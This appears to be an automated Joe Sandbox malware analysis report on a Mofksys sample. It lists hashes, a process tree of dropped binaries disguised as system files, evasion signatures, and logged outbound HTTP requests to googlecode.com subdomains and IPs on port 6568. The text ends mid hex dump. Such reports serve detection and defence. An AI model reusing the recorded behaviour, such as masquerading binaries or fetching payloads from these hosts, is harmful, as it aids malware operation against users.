Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sJ9Q8UWMAX.com_7fdb00c80f0250575a05601c08627d50

Overview

General Information

Sample Name:sJ9Q8UWMAX.com_7fdb00c80f0250575a05601c08627d50 (renamed file extension from com_7fdb00c80f0250575a05601c08627d50 to exe)
Analysis ID:666578
MD5:7fdb00c80f0250575a05601c08627d50
SHA1:709a67ee148978a05bb3c3b530d68004c1eb5196
SHA256:5d47d5ad88c5d99cac3a860e682bb9542046e05ee33b3a4fd896db5464e7f0a6
Tags:exe
Infos:

Detection

CryptOne, Mofksys
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mofksys
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
PE file has a writeable .text section
Queries memory information (via WMI often done to detect virtual machines)
Machine Learning detection for sample
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Modifies existing windows services
Sample file is different than original file name gathered from version info
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

  • System is w10x64
  • sJ9Q8UWMAX.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\sJ9Q8UWMAX.exe" MD5: 7FDB00C80F0250575A05601C08627D50)
    • sj9q8uwmax.exe (PID: 6912 cmdline: c:\users\user\desktop\sj9q8uwmax.exe MD5: 871EB4B8AEFAEA1113DD3F08B7CB535C)
      • sj9q8uwmax.exe (PID: 7024 cmdline: "c:\users\user\desktop\sj9q8uwmax.exe " --local-service MD5: 871EB4B8AEFAEA1113DD3F08B7CB535C)
      • sj9q8uwmax.exe (PID: 2884 cmdline: "c:\users\user\desktop\sj9q8uwmax.exe " --local-control MD5: 871EB4B8AEFAEA1113DD3F08B7CB535C)
    • icsys.icn.exe (PID: 6972 cmdline: C:\Windows\Resources\Themes\icsys.icn.exe MD5: 0A9BDF90EF50DEF16C6D4C363D0F0B9C)
      • explorer.exe (PID: 7056 cmdline: c:\windows\resources\themes\explorer.exe MD5: DD8285E811872E2562A43A04A7B27672)
        • spoolsv.exe (PID: 2532 cmdline: c:\windows\resources\spoolsv.exe SE MD5: A97B2BA7591F981B8BBB1CE5E78C8D3A)
          • svchost.exe (PID: 2960 cmdline: c:\windows\resources\svchost.exe MD5: E2A51AD55E5850D878E994E774D44ED1)
            • spoolsv.exe (PID: 5092 cmdline: c:\windows\resources\spoolsv.exe PR MD5: A97B2BA7591F981B8BBB1CE5E78C8D3A)
  • svchost.exe (PID: 6104 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6536 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 2928 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: DD8285E811872E2562A43A04A7B27672)
  • svchost.exe (PID: 6468 cmdline: "C:\windows\resources\svchost.exe" RO MD5: E2A51AD55E5850D878E994E774D44ED1)
  • svchost.exe (PID: 4672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sJ9Q8UWMAX.exeJoeSecurity_MofksysYara detected MofksysJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Resources\Themes\explorer.exeJoeSecurity_MofksysYara detected MofksysJoe Security
      C:\Windows\Resources\Themes\icsys.icn.exeJoeSecurity_MofksysYara detected MofksysJoe Security
        C:\Windows\Resources\spoolsv.exeJoeSecurity_MofksysYara detected MofksysJoe Security
          C:\Windows\Resources\svchost.exeJoeSecurity_MofksysYara detected MofksysJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000005.00000000.464382819.0000000000401000.00000080.00000001.01000000.0000000A.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
              0000000B.00000002.507320494.0000000000402000.00000080.00000001.01000000.0000000B.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                00000008.00000002.515627841.0000000000402000.00000080.00000001.01000000.0000000B.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                  00000010.00000002.563844103.0000000000402000.00000080.00000001.01000000.0000000C.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                    00000008.00000000.485612261.0000000000401000.00000080.00000001.01000000.0000000B.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                      Click to see the 13 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      2.2.icsys.icn.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                        11.2.spoolsv.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                          11.0.spoolsv.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                            8.2.spoolsv.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                              9.2.svchost.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                                Click to see the 11 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                No Snort rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for submitted file
                                Source: sJ9Q8UWMAX.exeVirustotal: Detection: 86%Perma Link
                                Source: sJ9Q8UWMAX.exeMetadefender: Detection: 85%Perma Link
                                Source: sJ9Q8UWMAX.exeReversingLabs: Detection: 100%
                                Antivirus / Scanner detection for submitted sample
                                Source: sJ9Q8UWMAX.exeAvira: detected
                                Antivirus detection for dropped file
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                Source: C:\Windows\Resources\spoolsv.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                Source: C:\Windows\Resources\svchost.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                Source: C:\Windows\Resources\Themes\explorer.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                Machine Learning detection for sample
                                Source: sJ9Q8UWMAX.exeJoe Sandbox ML: detected
                                Machine Learning detection for dropped file
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeJoe Sandbox ML: detected
                                Source: C:\Windows\Resources\spoolsv.exeJoe Sandbox ML: detected
                                Source: C:\Windows\Resources\svchost.exeJoe Sandbox ML: detected
                                Source: C:\Windows\Resources\Themes\explorer.exeJoe Sandbox ML: detected
                                Source: sJ9Q8UWMAX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 185.229.191.39:443 -> 192.168.2.5:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49807 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49856 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.237:443 -> 192.168.2.5:49889 version: TLS 1.2
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-64\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: sj9q8uwmax.exe , 00000001.00000002.745852702.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-32\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-64\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-32\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb@ source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdbR source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                barindex
                                Yara detected Mofksys
                                Source: Yara matchFile source: sJ9Q8UWMAX.exe, type: SAMPLE
                                Source: Yara matchFile source: 2.2.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.sJ9Q8UWMAX.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.0.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.sJ9Q8UWMAX.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000000.464382819.0000000000401000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.507320494.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.515627841.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.563844103.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.485612261.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.700344270.0000000000402000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.490867469.0000000000402000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.534411467.0000000000401000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.700388006.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.536439832.0000000000402000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000000.456086983.0000000000401000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.487856728.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.505285070.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.435290439.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.557848995.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: sJ9Q8UWMAX.exe PID: 6872, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: icsys.icn.exe PID: 6972, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Windows\Resources\Themes\explorer.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Resources\Themes\icsys.icn.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Resources\spoolsv.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Resources\svchost.exe, type: DROPPED

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\Resources\Themes\explorer.exeDomain query: codecmd02.googlecode.com
                                Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 142.250.102.82 80Jump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeDomain query: codecmd01.googlecode.com
                                Source: C:\Windows\Resources\Themes\explorer.exeDomain query: codecmd03.googlecode.com
                                Source: Joe Sandbox ViewJA3 fingerprint: c91bde19008eefabce276152ccd51457
                                Source: Joe Sandbox ViewIP Address: 92.223.88.41 92.223.88.41
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficTCP traffic: 192.168.2.5:49771 -> 92.223.88.41:6568
                                Source: global trafficTCP traffic: 192.168.2.5:49813 -> 49.12.130.236:6568
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 